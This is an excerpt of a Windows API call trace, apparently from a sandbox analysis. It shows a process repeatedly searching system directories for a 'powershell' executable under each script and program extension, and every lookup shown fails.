	[0417.677] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSF", lpFindFileData=0x1c85dbc0 | out: lpFindFileData=0x1c85dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0417.678] SetErrorMode (uMode=0x1) returned 0x1
	[0417.678] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c85da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0417.678] SetErrorMode (uMode=0x1) returned 0x1
	[0417.678] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSH", lpFindFileData=0x1c85dbc0 | out: lpFindFileData=0x1c85dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0417.678] SetErrorMode (uMode=0x1) returned 0x1
	[0417.678] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c85da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0417.679] SetErrorMode (uMode=0x1) returned 0x1
	[0417.679] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.MSC", lpFindFileData=0x1c85dbc0 | out: lpFindFileData=0x1c85dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0417.679] SetErrorMode (uMode=0x1) returned 0x1
	[0417.679] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c85da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0417.679] SetErrorMode (uMode=0x1) returned 0x1
	[0417.679] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell", lpFindFileData=0x1c85dbc0 | out: lpFindFileData=0x1c85dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0417.680] SetErrorMode (uMode=0x1) returned 0x1
	[0417.680] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c85da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0417.680] SetErrorMode (uMode=0x1) returned 0x1
	[0417.680] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.ps1", lpFindFileData=0x1c85dbc0 | out: lpFindFileData=0x1c85dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0417.680] SetErrorMode (uMode=0x1) returned 0x1
	[0417.680] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c85da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0417.680] SetErrorMode (uMode=0x1) returned 0x1
	[0417.681] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psm1", lpFindFileData=0x1c85dbc0 | out: lpFindFileData=0x1c85dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0417.681] SetErrorMode (uMode=0x1) returned 0x1
	[0417.681] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c85da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0417.681] SetErrorMode (uMode=0x1) returned 0x1
	[0417.681] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psd1", lpFindFileData=0x1c85dbc0 | out: lpFindFileData=0x1c85dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0417.681] SetErrorMode (uMode=0x1) returned 0x1
	[0417.681] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c85da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0417.682] SetErrorMode (uMode=0x1) returned 0x1
	[0417.682] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.COM", lpFindFileData=0x1c85dbc0 | out: lpFindFileData=0x1c85dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0417.682] SetErrorMode (uMode=0x1) returned 0x1
	[0417.682] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c85da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0417.682] SetErrorMode (uMode=0x1) returned 0x1
	[0417.682] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.EXE", lpFindFileData=0x1c85dbc0 | out: lpFindFileData=0x1c85dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0417.683] SetErrorMode (uMode=0x1) returned 0x1
	[0417.683] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c85da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0417.683] SetErrorMode (uMode=0x1) returned 0x1
	[0417.683] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.BAT", lpFindFileData=0x1c85dbc0 | out: lpFindFileData=0x1c85dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0417.683] SetErrorMode (uMode=0x1) returned 0x1
	[0417.683] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c85da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0417.683] SetErrorMode (uMode=0x1) returned 0x1
	[0417.683] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.CMD", lpFindFileData=0x1c85dbc0 | out: lpFindFileData=0x1c85dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0417.684] SetErrorMode (uMode=0x1) returned 0x1
	[0417.684] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c85da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0417.684] SetErrorMode (uMode=0x1) returned 0x1
	[0417.684] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBS", lpFindFileData=0x1c85dbc0 | out: lpFindFileData=0x1c85dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0417.684] SetErrorMode (uMode=0x1) returned 0x1
	[0417.684] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c85da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0417.685] SetErrorMode (uMode=0x1) returned 0x1
	[0417.685] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBE", lpFindFileData=0x1c85dbc0 | out: lpFindFileData=0x1c85dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0417.685] SetErrorMode (uMode=0x1) returned 0x1
	[0417.685] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c85da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0417.685] SetErrorMode (uMode=0x1) returned 0x1
	[0417.685] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JS", lpFindFileData=0x1c85dbc0 | out: lpFindFileData=0x1c85dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0417.685] SetErrorMode (uMode=0x1) returned 0x1
	[0417.686] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c85da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0417.686] SetErrorMode (uMode=0x1) returned 0x1
	[0417.686] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JSE", lpFindFileData=0x1c85dbc0 | out: lpFindFileData=0x1c85dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0417.686] SetErrorMode (uMode=0x1) returned 0x1
	[0417.686] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c85da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0417.686] SetErrorMode (uMode=0x1) returned 0x1
	[0417.687] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSF", lpFindFileData=0x1c85dbc0 | out: lpFindFileData=0x1c85dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0417.687] SetErrorMode (uMode=0x1) returned 0x1
	[0417.687] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c85da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0417.687] SetErrorMode (uMode=0x1) returned 0x1
	[0417.687] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSH", lpFindFileData=0x1c85dbc0 | out: lpFindFileData=0x1c85dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0417.687] SetErrorMode (uMode=0x1) returned 0x1
	[0417.688] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c85da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0417.688] SetErrorMode (uMode=0x1) returned 0x1
	[0417.688] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.MSC", lpFindFileData=0x1c85dbc0 | out: lpFindFileData=0x1c85dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0417.688] SetErrorMode (uMode=0x1) returned 0x1
	[0417.688] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c85da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0417.688] SetErrorMode (uMode=0x1) returned 0x1
	[0417.688] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell", lpFindFileData=0x1c85dbc0 | out: lpFindFileData=0x1c85dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0417.689] SetErrorMode (uMode=0x1) returned 0x1
	[0417.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c85da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0417.689] SetErrorMode (uMode=0x1) returned 0x1
	[0417.689] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.ps1", lpFindFileData=0x1c85dbc0 | out: lpFindFileData=0x1c85dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0417.689] SetErrorMode (uMode=0x1) returned 0x1
	[0417.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c85da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0417.689] SetErrorMode (uMode=0x1) returned 0x1
	[0417.690] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psm1", lpFindFileData=0x1c85dbc0 | out: lpFindFileData=0x1c85dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0417.690] SetErrorMode (uMode=0x1) returned 0x1
	[0417.690] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c85da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0417.690] SetErrorMode (uMode=0x1) returned 0x1
	[0417.690] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psd1", lpFindFileData=0x1c85dbc0 | out: lpFindFileData=0x1c85dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0417.690] SetErrorMode (uMode=0x1) returned 0x1
	[0417.690] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c85da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0417.691] SetErrorMode (uMode=0x1) returned 0x1
	[0417.691] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.COM", lpFindFileData=0x1c85dbc0 | out: lpFindFileData=0x1c85dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0417.691] SetErrorMode (uMode=0x1) returned 0x1
	[0417.691] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c85da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0417.691] SetErrorMode (uMode=0x1) returned 0x1
	[0417.691] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.EXE", lpFindFileData=0x1c85dbc0 | out: lpFindFileData=0x1c85dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0417.692] SetErrorMode (uMode=0x1) returned 0x1
	[0417.692] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c85da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0417.692] SetErrorMode (uMode=0x1) returned 0x1
	[0417.692] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.BAT", lpFindFileData=0x1c85dbc0 | out: lpFindFileData=0x1c85dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0417.692] SetErrorMode (uMode=0x1) returned 0x1
	[0417.692] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c85da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0417.692] SetErrorMode (uMode=0x1) returned 0x1
	[0417.692] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.CMD", lpFindFileData=0x1c85dbc0 | out: lpFindFileData=0x1c85dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0417.693] SetErrorMode (uMode=0x1) returned 0x1
	[0417.693] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c85da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0417.693] SetErrorMode (uMode=0x1) returned 0x1
	[0417.693] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBS", lpFindFileData=0x1c85dbc0 | out: lpFindFileData=0x1c85dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0417.693] SetErrorMode (uMode=0x1) returned 0x1
	[0417.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c85da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0417.694] SetErrorMode (uMode=0x1) returned 0x1
	[0417.694] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBE", lpFindFileData=0x1c85dbc0 | out: lpFindFileData=0x1c85dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0417.694] SetErrorMode (uMode=0x1) returned 0x1
	[0417.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c85da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0417.694] SetErrorMode (uMode=0x1) returned 0x1
	[0417.694] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JS", lpFindFileData=0x1c85dbc0 | out: lpFindFileData=0x1c85dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0417.695] SetErrorMode (uMode=0x1) returned 0x1
	[0417.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c85da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0417.695] SetErrorMode (uMode=0x1) returned 0x1
	[0417.695] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JSE", lpFindFileData=0x1c85dbc0 | out: lpFindFileData=0x1c85dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0417.695] SetErrorMode (uMode=0x1) returned 0x1
	[0417.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c85da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0417.696] SetErrorMode (uMode=0x1) returned 0x1
	[0417.696] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSF", lpFindFileData=0x1c85dbc0 | out: lpFindFileData=0x1c85dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0417.696] SetErrorMode (uMode=0x1) returned 0x1
